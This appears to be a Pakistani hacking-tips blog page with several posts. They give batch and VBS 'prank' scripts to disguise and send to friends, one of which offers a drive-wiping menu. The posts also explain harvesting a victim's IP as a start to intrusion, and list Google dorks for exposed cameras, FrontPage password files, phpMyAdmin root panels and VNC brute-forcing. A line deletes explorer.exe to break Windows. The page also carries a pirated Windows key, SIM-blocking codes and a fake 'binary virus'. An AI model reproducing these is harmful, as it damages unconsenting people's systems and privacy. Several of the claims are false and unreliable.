Showing posts with label Special Page. Show all posts
Showing posts with label Special Page. Show all posts
Friday, February 14, 2014
Monday, February 10, 2014
Check Online Details Of Vehicle
Check Online Details of Car,Bike Vehicle(Punjab)
Salam From Mohammed Faizan
Online Vehicle Verification Punjab Find Registration Details of Vehicle (Car/Bike etc)
You can try Different Combinationse.g;
ABC 000 ..................................LXZ 123
ABC 0000 ................................LXZ 0123
ABC 0000 ................................LXZ 1111
ABC-00-0000 ..........................RIA-07-1111
Tuesday, February 4, 2014
Monday, January 20, 2014
Saturday, December 7, 2013
10 Most dangerous scripts to prank your friends
10 Most dangerous scripts to prank your friends
salam from Mohammed faizan
![]() |
=======================================
ALL OF THEZE COMMANDZ ARE TO BE TYPED IN NOTEPAD...
=======================================
1) Convey your friend a little message and shut down his / her computer:
Type :
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" in All Files and send it.
=========================================
2) Toggle your friend's Caps Lock button simultaneously:
Type :
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.
clcik here for more
=========================================
3) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it.
===========================================
4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.
================================================== =
5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Save it as "Anything.VBS" and send it.
================================================== =========
6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Anything.VBS" and send it.
================================================== =======
7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
Save it as "Anything.VBS" and send it.
================================================== ==
8. Open Notepad continually in your friend's computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.
================================================== ====
9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save it as "Anything.BAT" and send it.
================================================== ======
You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.
To Stop this ->
Go To Task Manager and End wscript.exe process.
Friday, November 29, 2013
How to get SomeOnes Ip address
How to get SomeOnes Ip address!!!

salam from mohammed faizan
Now today i will explain you how to get IP address of any computer remotely. Using some very basic tricks we can find the IP address of any remote computer and then you can start your further hacking into the remote system like port scanning and finding vulnerabilities to enter in to the system and hack it. There are several methods to get an IP address of the victim but i will share few and specially the best one's that can tell you IP address in just few clicks and also all are free methods and special thing is about it is all are manual methods that means you did not require any tool.
4 ways to get the IP address of the Victim or another Computer:
1. Using PHP notification Script
2. Using Blogs and Websites
3. Using Read Notify service
4. Sniffing during Gmail and yahoo chat sessions
As we are here to learn concepts so i will first explain what is an IP address and what's its importance. So friends very basic question What is an IP address? Why its important for hackers and security professionals?
What is an IP address?
Basically IP address (Internet Protocol address) is a unique numerical value that is assigned to any computer or printer on a computer network that uses an internet protocol for communication purpose. Protocol is basically rules( for Network its rules for communication).
IP address serves for two basic purposes:
1. Host or network interface identification
2. Location Addressing
1. Using PHP notification Script
1. Using PHP notification Script
Using this Notification script you can get the IP address in just seconds. Steps of using this PHP script:
a. Download the PHP notify script and extract files.
b. Now you will get two files IP.html and index.php . You need to upload these two files to any free web hosting server.
Example: i used www.my3gb.com to upload these two files. Create an account there and upload these two files there as shown below.
c. Now you will need to send the link of index.php to the victim whose password you want to get. to get the link click on index.php shown in above snapshot. Now a new window will open copy the link in the address bar and send to the victim whose IP address you want.
d. Now when the victim opens the above link nothing will open but his Ip address is written into the ip.html file. So open the ip.html file to get his IP address.
e. That's all this method... I hope you liked it. 2. Using Blogs and Websites
This method is for those who have their blogs or websites. Normal users can also do this as blog is free to make. Make a new blog and use any stats service like histats or any other stats widget. Just add a new widget and put histats code there and save template. And send the link of your blog to your friend and get his IP.
That's only.
3. Using Read Notify service
This is an email based service. Steps to use Read Notify service:
a. First open the Read Notify website : RCPT
b. Now register on this website and then it will send you confirmation mail. Verify your account.
c. Once your account is activated.
Do the following steps use this service:
- Compose your email just like you usually would in your own email or web email program
- Type: .readnotify.com on the end of your recipients email address (don't worry, that gets removed before your recipients receive the email). Like this: shiviskingg@gmail.com.readnotify.
com - Send your email
- don't send to and from the same computer
- if your email program 'auto-completes' email addresses from your address book, you'll need to keep typing over the top of the auto-completed one to add the .readnotify.com
- if you are cc-ing your email to other readers, you must add tracking to all of them
4. Sniffing Yahoo and Gmail Chat sessions
With the help of Sniffers like ethereal, wireshark etc we can sniff the Gmail, and yahoo chat sessions while we are chatiing to any our friend and extract the IP address from there. I will explain this trick in detail in my next article as its a long article in itself.5. Bonus Method for Online Gamers
We can also get the IP address from online games like counter strike, age of empires in Game ranger etc.. Many counter strike servers use amx mode. Just view which people are connecting and whats their IP addess as plugins show the IP address of people connecting to the game server. If you have more access to counter strike server you can use status command in console. Just go to console and type "status"(without quotes) and press enter there you can see all players details his steam ID and much more depending upon server.Important Tricks
- Blood ki zarorat ho to yeh site visit karain www.pakdonor.com
- Dunya main kisi b number pr 5 mint free bat karain visit www.localphone.com
- Free call all over the world visit www.tpad.com www.freecallbutton.com
- Mobile chori ho es pe imei send karo cop@vsnl.net
- Free 25GB online storage log on hugedrive.com and sign up plus there is skydrive.live.com(25 GB free to store ur data)
- Flash web bananey k liye visit wix.com aur dosri websites k liye webs.com ya weebly.com blog k liye blogger.com ya blog.com aur dot.tk domain k liye www.dot.tk
- For call and sms hacking software download spy for anything visit Download.cnet.com
- Hold window key and press L it will lock ur computer
- Apne friend k window urane k liye Open notepad type Del c:/windows/explorer.exe save as .bat aur desktop pr rakh do jo open kare g to window delete
- App ke computer main koi C: ya D: ko nhi dekh sakta click start run main ja kr type gpedit.msc aur enter press karo phir administrative templates main ja kar system pr click karo Hide these specified drives from my computer ko enable kro
- windows Genuine keys JT4C7-CYT8T-HXDG7-PVTG4-T7JYD
- Computer screen ulti karny k liye CTRL Alt Up Arrow sedhi karny k liye CTRL Alt Down Arrow esi tarha aap screen left right bhi kar saktay hain
- Windows keys shortcuts Win+E open my computer Win+F search for file and folder CTRL+I catch image from media player Alt+Z move back deleted file
- Auto shutdown Pc at 11pmin run type “At 11:00 pm -s” for restart “At 11:00 pm -r”
- Check hardware and software’s problem go to run type"msinfo32" and enter
- Visit these sites u see bundles of tips and tricks about computer mobile internet etc softronicinfo.blogspot.com, boomtrick.blogspot.com
- Want to earn online money without investment just logon to http://www.it-education-pk.blogspot.com and start earning
- Ghar baithay kisi ki b sim block karo go to Google and then 8.2.35ufone/ulock664ak.com aur kisi ki b sim block karain password:kufonepm3
- Visit www.TexTTrickS.Tk for free trick ab8 PC Web development ,PC+mobile,sofwares +Portables,SEO,Forum making, Blogging.
- Zong se ki jane wali calls ka record check karain http://203.82.55.30/ebilling
- Enjoy free zong unlimited zong internet go to internet setting (profile of zong internet) change access point (APN) to ZONGMMS now give enter space before ZONGMMS save setting and restart your mobile now enjoy e.g. ACCESs POINT :
ZONGMMS
- Telenor free internet APN:mms Homepage:www.google.com Port:172.18.19.11 Proxy:8080 use with 0 balance
- Hide ur number show others unknown number or private number dial “00448700360419p00923331234567” Rs 15+tax charges
- Kisi b network ki sim block karne k liye **04*3814*7529*68243#
- Homepage: http://t.co/7FTBvH8 User name:Vastnet Proxy: 10.81.6.033 APN: ZongMMS.vastnet Port: 9202
- Hide your personal data in memory card by “FILE EXPLORER” download this software from www.downloadwap.com
- Agar aap ko windows xp banana ya edit karni hai tu yeh site visit karain www.editxp.maker.com
- Speed up ur Pc go to RUN>msconfig>startup>disable all and restart
- Check hardware error in ur system go to run type chkdsk
- Send free mms now using Mobilink jazz here are the settings :- Proxy:172.024.097.029 Port:8080 MMS Url:172.24.97.29:8080 APN:jazz.mms
- Apnay mobile main ”Files Tour” software install karain aur delete kiya hua data recover karain
- Send free MMS all over the world Visit this site http://t.co/JFwTPRH
- Hidden Bluetooth in Windows xp Run command prompt and type “fsquirt”
Without quotes Now just select whether u want to send receive any file.
- Job search all over the world visit www.networker.com www.jobsearch.org www.jobsoptions.com www.wantedjobs.com www.jobshejobs .com
- To convert ur drive from FAT to NTFS open run type ”convert d:/fs:ntfs”
- Apnay computer k search main .eml lik kr enter press karain phir jo files show hongi un ko delete kar dain virus delete ho jaye ga
- Aap k CNIC p kitni Sim’s registered hain online free check www.pta.gov.pk/668/index.html
- To check out your internet history press CTRL+H for zoom in and zoom out CTRL+mouse wheel
- If u want to increase the speed of computer then use this software “AUOST SPEED” download it from www.AUSLOGIC.com
- Xp main Folder icon or background change karny k liye Lovely Folder name k software use karain
- Convert your 1GB memory card to 2GB free open this linkhttp://t.co/PCquMA7
- Delete an undeletable file: Open Cmd, open Task manger, go to processes, and end explorer.exe. Then Cmd type the <file path> and press enter.
- Virus to format hard disk using notepad: Open notepad Type 0100101100011111001001010101010101010000011111100000 and save as deleteHD.exe Now Run it. for more www.softronicinfo.blogspot.com
- Apni tasveer ya apne naam ka Picture Msg banayen www.wapbites.com “DRAW SMS.sis” Download karen its s60 v3,5.
- Convert ur hard drive from FAT to NTFS open run type “convert d:/fs:ntfs”
- Speed up ur PC press Alt+Ctrl+Delete Click on view click on update speed click on High.
- Computer ko beghair mouse k Num pad k madad se b chalaya ja skta hai.Alt+Shift+Num Lock then press ok
- Visit these sites and make ur text in 3DStyles and animations www.textspace.net www.flammingtext.com www.cooltext.com www.sparklee.com
- Convert ur 1GB memory card to 2GB visit and download http:/www.coolpctips.com/2010/08/convert-your-1gb-memory-card-2gb-free
- Agar aap ko hacking knowledge hasil karna hao to visit with detail www.rootabega.org www.rootshell.com www.insecure.org/sploits
- Apni website aur blog khud bnain es site pr aik book urdu main likhi hui jis me website bnaney ka tareqa likha hai www.itship.tk
- Now hack and sniff password with the help of a tool called wireshark click on link to see how to hack http://t.co/AiZluMst
- Ab aap mobile mein sms read kaarny per b paisay kma saktay hain visit this site www.sms4ads.net es main aap easyload b hasil kar sakty hain
- Agar aap kisi admi ka mobile num use karna chahte hai to wap.qeep.net pe visit kr k uska num use kren
- Quran with urdu translation for all java-enabled mobiles has been uploaded on: http://t.co/WpA0QkO7
- Earm free money register on these sites and earn as much as u can tinyrcb.com/bumper tinyrcb.com/survey
- Apni website aur blg pe google ads lagain aur earning karain.Adsense approving tips k ly. www.Hackstuff.tk
- Get cheat codes of any game download cheatbook from this site and put the name and get cheat codes www.cheatbook.de
- Free calling websites www.NET2PHONE.com www.visittalk.com www.vocaltec.com www.freewebcall.com
- See world without software satellite k zarye dunya dekhnaye k liye go to www.immigration.pk
- Pore dunya main free sms karo without registration aur jitna chahe lamba sms ho open this site www.uthsms.net
- Ab aap all worl kisi b Network k number ki free ma location para karain visit www.informationmadness.com/php/phonelocation.html
- Download “Solar Vox” and charge any USB device using the sun light http://t.co/xdjsh531
- Visit now www.zswfun.com and just click on unlimited pictures and earn daily up to 500rupees.
- Agar koi online paisay kmana chahta hai visit www.justtricks.tk wahan puri tafseel urdu main hai
- Conver any file in any format online free http://www.youconvertit.com
- Find the instan Solution of any of the math problem http://www.mathway.com
- For Typing Test go to this site http://speedtest.10-fast-fingers.com//
thnx 4r visiting,but must comment about my this post
Sunday, November 24, 2013
How To Hack Google
How To Hack Google

1st Hack :-
Viewing Security Cameras Using Google :-
>> Open Google And Type :
inurl:"viewerframe?mode=motion"
In The Search Bar ,Open Any Results Shown To See Other's Security Cameras.
2nd Hack :-
Viewing Motion Security Video Cameras Using Google :-
>> Open Google And Type :
intitle:"Live View / - AXIS"
In The Search Bar ,Open Any Results Shown To See Other Online Video Cameras.
3rd Hack :-
Unspidered Sites Using Google :-
>> Open Google And Tye :
"robots.txt" "disallow:" filetype:txt
In The Search Bar,Open Any Results Shown To See Hidden Web Page.
4th Hack :-
Frontpage User Info Using Google :-
>> Open Google And Tye :
inurl:_vti_pvt "service.pwd"
In The Search Bar,Open Any Results Shown To See Other Frontpage User Info.
5th Hack :-
PHP Photo Album Hack Using Google :-
>> Open Google And Tye :
inurl:"phphotoalbum/upload"
In The Search Bar,Open Any Results Shown To Upload / Download Other's Photos
6th Hack :-
VNC User INFO Using Google :-
>> Open Google And Tye :
"vnc desktop"inurl:5800
In The Search Bar,Open Any Results Shown To Make Bruteforce Attack To Access Others Computers.
7th Hack :-
Accessing Printers Using Google :-
>> Open Google And Tye :
inurl:"port_255" -htm
In The Search Bar,Open Any Results Shown To Configure Any Documents On Other Network Printers.
8th Hack :-
PHP Admin Account Hack Using Google :-
>> Open Google And Tye :
intitle:phpMyAdmin "Welcome to phpMyAdmin"***" "running on * as root@*"
In The Search Bar,Open Any Results Shown To Go To Somebody's Web Page Admin Accounts.
How To Continually Pop The CD / DVD Drive
How To Continually Pop The CD / DVD Drive
![]() |
Boomtrick.blogspot.com |
Follow These Steps :-
Open Notepad.
Copy the code given below onto the notepad file:-
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “Anything.VBS”.
Now open the file and see the magic!
The file will continuously force the CD rom to pop out!
And If you have more than one then it pops out all of them!
How To Lock USB Ports
How To Lock USB Ports

To do this you have to make a registry tweak that will prevent writing to the usb port in
Windows XP.
1) Go to Start Than Run and type 'Regedit'.
2) Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control.
3) Here add a new folder on the left pane by right clicking on it and selecting 'New Key'.
4) Name this folder 'StorageDevicePolicies'.
5) Click this new folder and in the window on the right create a new DWORD value,
label it and Write Protect, give it a value of '1'.
6) Now users will not be able to write any data on the USB.
To turn it off just set the value to '0'
Saturday, November 23, 2013
How To Make Free Call Any Where in india
How To Make Free Call Any Where
Make Free Call to any Mobile:
1. First of all, go Site2Sms.com , open this site and register by using your mobile number which you want to call free.
2. After registeration completed, login with your mobile number and password.
3. After login, click on Send Sms.

4. Now click on Live Voice Call.
![]() |
boomtrick.blogspot.com |
5. Now click on Dial Number.

6. Now new page will open and enter any mobile number which you want to make free call.
7. Now it will connect your call to your friend, the call is dailled by site and your friend's mobile will rings.
8. First 5 sec computer will speak, now after 5 seconds, your mobile phone rings.
9. Now pick up your mobile and enjoy free voice call.
(Note-That you will allow only 4 Minutes to talk, after that time you will have to Connect call again.)
Enjoy....
Subscribe to:
Posts (Atom)